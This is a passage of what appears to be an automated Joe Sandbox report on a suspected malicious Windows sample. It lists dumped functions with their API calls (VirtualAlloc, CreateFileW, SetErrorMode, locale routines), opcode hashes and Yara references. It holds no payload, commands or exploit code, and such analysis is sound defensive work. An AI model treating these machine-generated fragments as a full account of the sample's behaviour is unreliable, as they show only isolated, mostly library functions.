                                                                                                                                                                                                                                  control_flow_graph 1755 5bb0e0f-5bb0e24 SetErrorMode * 2 1756 5bb0e2b-5bb0e2c 1755->1756 1757 5bb0e26 1755->1757 1757->1756
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000400,?,?,05BB0223,?,?), ref: 05BB0E19
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,05BB0223,?,?), ref: 05BB0E1E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                  • Instruction ID: 36f11a4fb15f1363c24fb51da6a1cc7a0585d5c8bbbf76bc5244d06063cd0623
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 57D0123154512C77D7003A94DC0DBDE7B1CDF09B62F008051FB0DD9080C7F1954046E5
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041878B Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 2ae4b7848d5fc5729d99f5a7e27ee10caa38967bc1771efee0ecf6ad26560584
                                                                                                                                                                                                                                  • Instruction ID: d77f3fb4a2dea80d7e26f58f35abdac3f7963be9eaf0666b1d936bf3e200b83d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ae4b7848d5fc5729d99f5a7e27ee10caa38967bc1771efee0ecf6ad26560584
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11510771A00108AFDB10DF29C840BFA7BA1EF85364F19815EE8489B392CB39DD82C759
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00401F2B Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __fread_nolock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2638373210-0
                                                                                                                                                                                                                                  • Opcode ID: 25aeabf7499e8ad583be7248ba51f421055d1c52451b24307ef19921f3e1bf67
                                                                                                                                                                                                                                  • Instruction ID: 0bde1253143090ae73d8540e9fd285f072e0ff93183f3a7406587cf81db67a05
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 25aeabf7499e8ad583be7248ba51f421055d1c52451b24307ef19921f3e1bf67
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF316B31604706AFC710DE29C884A5ABBA0BF88354F04863EF954A73A1D779D854CB9A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004024A1 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004024A6
                                                                                                                                                                                                                                    • Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                                                                                                    • Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception@8H_prologThrowstd::system_error::system_error
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 938716162-0
                                                                                                                                                                                                                                  • Opcode ID: 1152c10f0f73a98428df0f9104ae7712f9923eb88e3ed4c89856aabc2728c85f
                                                                                                                                                                                                                                  • Instruction ID: 51a424f7f6e89c6a531f911fc24cb136489b0386115aa572e9e255c0d5409117
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1152c10f0f73a98428df0f9104ae7712f9923eb88e3ed4c89856aabc2728c85f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9318B71A00505AFCB18DF69C9D5E6AB7F5FF84318718C16EE416AB791C634EC40CB54
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040257C Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00402581
                                                                                                                                                                                                                                    • Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3519838083-0
                                                                                                                                                                                                                                  • Opcode ID: 2c318ff338f7a8eac22c397537d2360df678c12f2412966b479c09de5dfc03e1
                                                                                                                                                                                                                                  • Instruction ID: 5794e906f2440793f0f111a630642e31dc7bb6ced8b38f44c89e924cf631a0c7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c318ff338f7a8eac22c397537d2360df678c12f2412966b479c09de5dfc03e1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87318770A00615AFCB15DF09CA84A9ABBB1FF48314F14856EE405AB791C7B9ED40CB94
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00402403 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00402408
                                                                                                                                                                                                                                    • Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3519838083-0
                                                                                                                                                                                                                                  • Opcode ID: 8ed48e9fba55e0418c031890955b2c9948e55e9159a839dee9493f5c858f8f4c
                                                                                                                                                                                                                                  • Instruction ID: 4e0495d31301cfc09fe992fc8428b3d42591f74c8e771436201b91ad316d0700
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ed48e9fba55e0418c031890955b2c9948e55e9159a839dee9493f5c858f8f4c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D217C70601611DFC728DF19C54896ABBF5FF88314B20C26DE85A9B7A1C774AE41CB90
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041AFF9 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __wsopen_s
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3347428461-0
                                                                                                                                                                                                                                  • Opcode ID: 9d91d9df30251d2d82c78a357851f1850054374a36094e401c27366056efc238
                                                                                                                                                                                                                                  • Instruction ID: 62b4485d732ad4ebc0017ff3881fb56af0f069673ee8f9cf524c42d6b5156d4d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d91d9df30251d2d82c78a357851f1850054374a36094e401c27366056efc238
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6911367590410AAFCB05DF98E9419EB7BF4EF48314F0040AAF819AB311D631E9618BA9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040E1B2 Relevance: 1.5, APIs: 1, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 6507e6dca9fd37c1152104383e81a26a388e7b6248357c92fed83c7c77d0c48c
                                                                                                                                                                                                                                  • Instruction ID: bb13e13d757cd37dfe0a4f239b5d8845d05e4a8eb61872b1cde1787caac163ea
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6507e6dca9fd37c1152104383e81a26a388e7b6248357c92fed83c7c77d0c48c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4F0F93254061496D6213A6B9C0579B32AC9F92339F114BBFFC30A61C2CA7CE95246AE
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00402F6B Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00402F70
                                                                                                                                                                                                                                    • Part of subcall function 004035F5: __EH_prolog.LIBCMT ref: 004035FA
                                                                                                                                                                                                                                    • Part of subcall function 004035F5: std::_Lockit::_Lockit.LIBCPMT ref: 00403609
                                                                                                                                                                                                                                    • Part of subcall function 004035F5: int.LIBCPMT ref: 00403620
                                                                                                                                                                                                                                    • Part of subcall function 004035F5: std::locale::_Getfacet.LIBCPMT ref: 00403629
                                                                                                                                                                                                                                    • Part of subcall function 004035F5: std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prologLockitstd::_$GetfacetLockit::_Lockit::~_std::locale::_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3585332825-0
                                                                                                                                                                                                                                  • Opcode ID: 275b497e8b0ccd48a1c91312fae6d11bbe173a5bd3edbee57c471b6d182478c8
                                                                                                                                                                                                                                  • Instruction ID: 4123f54f6db546b52d5441bf0cc69889d4086bdab9222fcc4d2dc13d92cadc12
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 275b497e8b0ccd48a1c91312fae6d11bbe173a5bd3edbee57c471b6d182478c8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32018F70610114AFDB14DB65CA0ABAEB3F9AF44708F00403EF405B76D1DBF8AE408B58
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041A2FA Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: e7ba057ced36894faabbf0cfef253f3c85e20b59e21e5f6d36d312241c511836
                                                                                                                                                                                                                                  • Instruction ID: b492b302e4735b3d70b5ef79ffcf6f17a9fdb10017537b69176e17197afc0c8a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e7ba057ced36894faabbf0cfef253f3c85e20b59e21e5f6d36d312241c511836
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6DF09A3251111CBBCF015E96DC01DDA3B6EEF89324F100256FD2492050DA3ACA61ABA5
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00417A45 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                  • Opcode ID: 092e8eca157d4569dfa0d65f99c280fa9eac993ee60f56a2dbe510387d4a55ad
                                                                                                                                                                                                                                  • Instruction ID: dd4a480e522f73ad3d9a6edd52b828d095e0909c103fd04d4038ae70eb088b48
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 092e8eca157d4569dfa0d65f99c280fa9eac993ee60f56a2dbe510387d4a55ad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35E0A03128822557972026629C00BDF6A69AF417E0B150223BC0496290CA5C8BD182AD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00409256 Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00409967
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception@8Throw
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2005118841-0
                                                                                                                                                                                                                                  • Opcode ID: 489952d28efb397f2e18812c634cc1d627a37715331dca0dd55d847e965f5b37
                                                                                                                                                                                                                                  • Instruction ID: da63f0164d942bc1a0aafd7abbbc04ca9aad8e839738e50b0fb3006ae61beab9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 489952d28efb397f2e18812c634cc1d627a37715331dca0dd55d847e965f5b37
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9E0923440430EB6CF047A66D9169AA372C1E00324F20897FB818B55E2EB78DDA6C59E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041A039 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0041A056
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                  • Opcode ID: 8f292a683753c08d8b1a23b46936a59e33a617ccbc84d6f71105d7b09af89fad
                                                                                                                                                                                                                                  • Instruction ID: d84f72958a1ce38eec5c6f13dd7d1e1a4f86a781eb43601fc0a5ec169b289762
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f292a683753c08d8b1a23b46936a59e33a617ccbc84d6f71105d7b09af89fad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2D06C3210010DBBDF129F84DC06EDA7BAAFB48754F018010BA5856060C732E872AB94
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0411C995 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0411C9E6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255300318.000000000411C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0411C000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_411c000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                  • Instruction ID: 726a4e5d5120e02daf728ff77f82a357090ba5b32fa4be5ce30ab480f5d18166
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE113C79A40208EFDB01DF98C985E99BBF5AF08350F0580A5F9489B361E371EA50DF80
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 0042099B Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 188COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
                                                                                                                                                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00420AA7
                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00420B02
                                                                                                                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00420B11
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,=CA,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00420B59
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000004,00000040), ref: 00420B78
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                                                                  • String ID: 0B$=CA$=CA$=CA
                                                                                                                                                                                                                                  • API String ID: 745075371-1249640317
                                                                                                                                                                                                                                  • Opcode ID: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
                                                                                                                                                                                                                                  • Instruction ID: 4fe3cdac360959e8bc756ce2b097bcf421192d2936f9b63a8d14e5918577f4e5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E519471B003259BDB20DFA5EC45BBF73F8AF24700FC4446AA904E7292D77899408B59
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00420063 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 236COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00414344,?,?,?,?,00413D9B,?,00000004), ref: 00420145
                                                                                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 004201D5
                                                                                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 004201E3
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,DCA,00000000,?), ref: 00420286
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                                                                                  • String ID: 0B$DCA
                                                                                                                                                                                                                                  • API String ID: 4212172061-1121888207
                                                                                                                                                                                                                                  • Opcode ID: 46676c4ac3c69468ff1db77bf10ad3de6e3b023533a561db1a5166dfe2bba4dc
                                                                                                                                                                                                                                  • Instruction ID: e41c47d1cae27ef38c8e1a894900132afe6bf825e943f98d621edfc326b9cdfb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46676c4ac3c69468ff1db77bf10ad3de6e3b023533a561db1a5166dfe2bba4dc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34610775700225AAD724AB65EC46BBB77E8EF04314F54006FF905DB283EB78ED418768
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

